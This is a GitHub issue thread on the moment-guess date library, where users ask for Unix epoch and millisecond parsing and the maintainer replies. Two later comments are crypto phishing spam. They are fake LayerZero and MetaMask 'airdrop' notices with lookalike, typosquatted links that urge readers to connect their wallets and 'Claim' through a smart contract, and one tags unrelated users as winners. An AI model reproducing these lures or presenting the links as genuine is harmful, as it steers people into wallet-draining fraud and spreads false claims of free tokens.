### ISSUE TITLE
Millisecond Support

### ISSUE THREAD

**Issue by amcdnl** [apoorv-mishra/moment-guess#2]
Would be great to have epoch and millisecond support.

**Comment by apoorv-mishra** [comment]
Hi @amcdnl , millisecond support is already in place, not solely, but when used with seconds in most commonly used time formats(try `npx moment-guess -d '23:00:00.123'`). With epoch, do you imply Unix timestamp? It would be great if you could elaborate with an example.

**Comment by jallspaw** [comment]
Yeah, it would be great to have epoch (yes Unix timestamp) support, like:

```
:~ jallspaw$ date
Wed Jan 12 13:33:23 EST 2022
:~ jallspaw$ date '+%s'
1642012409
:~ jallspaw$ npx -q moment-guess --date "1642012409" --format strftime
ERROR: Couldn't parse date
```
Ideally, we'd get back a %s for that?

**Comment by earlyraven** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by mesidharth** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @rdegges, @kreeves, @rnarian, @nkl0x55, @Mainali, @dastergon, @toddwprice
